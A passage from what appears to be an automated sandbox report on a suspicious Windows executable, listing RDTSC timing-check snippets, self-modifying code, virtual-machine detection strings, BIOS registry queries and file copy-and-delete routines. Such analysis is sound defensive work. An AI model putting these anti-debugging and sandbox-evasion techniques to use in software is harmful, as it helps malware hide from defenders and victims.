                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F7E second address: 9D3FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 ja 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FE83906A393h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6DB5 second address: 9D6DEB instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83905447Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FE83905449Dh 0x00000014 push edi 0x00000015 jmp 00007FE83905447Ch 0x0000001a pop edi 0x0000001b push esi 0x0000001c jmp 00007FE839054481h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6711 second address: 9D6717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6717 second address: 9D671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D671D second address: 9D6721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6721 second address: 9D6725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6725 second address: 9D672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D672B second address: 9D674C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE83905447Ch 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jng 00007FE83905447Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D674C second address: 9D6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D68E8 second address: 9D68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D68EE second address: 9D68F8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D68F8 second address: 9D6913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054485h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6913 second address: 9D692E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D692E second address: 9D6961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FE839054484h 0x00000014 jmp 00007FE83905447Eh 0x00000019 jmp 00007FE839054481h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6961 second address: 9D6967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6967 second address: 9D696B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9F2A second address: 9D9F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9AD5 second address: 9D9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9ADD second address: 9D9AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE83906A38Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFF3C second address: 9DFF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFF53 second address: 9DFF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 jbe 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE83906A38Fh 0x00000018 jmp 00007FE83906A38Eh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF2FB second address: 9EF300 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF5CB second address: 9EF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF5D3 second address: 9EF5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FE83905447Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF5E2 second address: 9EF5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF5E8 second address: 9EF5F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF5F5 second address: 9EF5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF74B second address: 9EF74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF74F second address: 9EF759 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE83906A386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF759 second address: 9EF76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE83905447Ch 0x0000000c jnl 00007FE839054476h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF76B second address: 9EF771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8BC second address: 9EF8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8C2 second address: 9EF8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8C6 second address: 9EF8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8D7 second address: 9EF8DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8DD second address: 9EF8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8E3 second address: 9EF8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8E7 second address: 9EF910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054485h 0x00000007 jc 00007FE839054476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FE839054476h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F05DE second address: 9F05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F05E5 second address: 9F05EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3431 second address: 9F3449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FE83906A38Eh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3598 second address: 9F35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FE83905447Ch 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE83905447Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F35B6 second address: 9F35BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E220 second address: A0E236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1020B second address: A10216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE83906A386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0FDAD second address: A0FDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F27 second address: A23F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23F31 second address: A23F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22F15 second address: A22F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A230AA second address: A230B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23692 second address: A236B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE83906A392h 0x0000000a jmp 00007FE83906A38Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A236B6 second address: A236D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054487h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23AEE second address: A23AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE83906A386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23AF8 second address: A23AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23AFC second address: A23B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23B07 second address: A23B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FE839054486h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23B2A second address: A23B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26BE2 second address: A26C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FE839054488h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FE83905447Ah 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26C26 second address: A26C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26C2A second address: A26C34 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26C34 second address: A26C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26C3A second address: A26C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26C3E second address: A26C53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FE83906A386h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A29FA2 second address: A29FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702AD second address: 50702B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702B1 second address: 50702C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702C0 second address: 50702F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE83906A38Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702F2 second address: 50702FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 516CD279h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702FC second address: 507030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507030E second address: 5070312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070312 second address: 5070327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703EA second address: 507040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83905447Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507040E second address: 5070424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070424 second address: 5070428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070428 second address: 507042E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507042E second address: 507047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE839054488h 0x00000008 pushfd 0x00000009 jmp 00007FE839054482h 0x0000000e jmp 00007FE839054485h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507047D second address: 5070490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070490 second address: 5070496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070496 second address: 507049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507049A second address: 507049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A8D second address: 946A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE83906A386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946C12 second address: 946C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946E51 second address: 946E56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A1982 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7A1A1F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 93BB9E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 942BD3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9CBF23 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00541160 GetSystemInfo,ExitProcess,0_2_00541160
                Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1824677690.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
